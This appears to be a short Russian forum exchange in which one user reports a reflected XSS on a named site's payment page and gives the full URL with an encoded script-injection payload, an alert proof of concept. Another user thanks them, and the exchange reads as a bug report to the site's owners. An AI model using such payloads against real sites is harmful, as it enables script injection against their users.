собственно вот нашел пасивную xss.

http://overlords.ru/flypay.php?dest=%22%3E%3Cscript%3Ealert%28%27XSS+B y+Dima%27%29%3C%2Fscript%3E%3C%22

Спасибо :)
Если найдешь еще, будем очень благодарны :)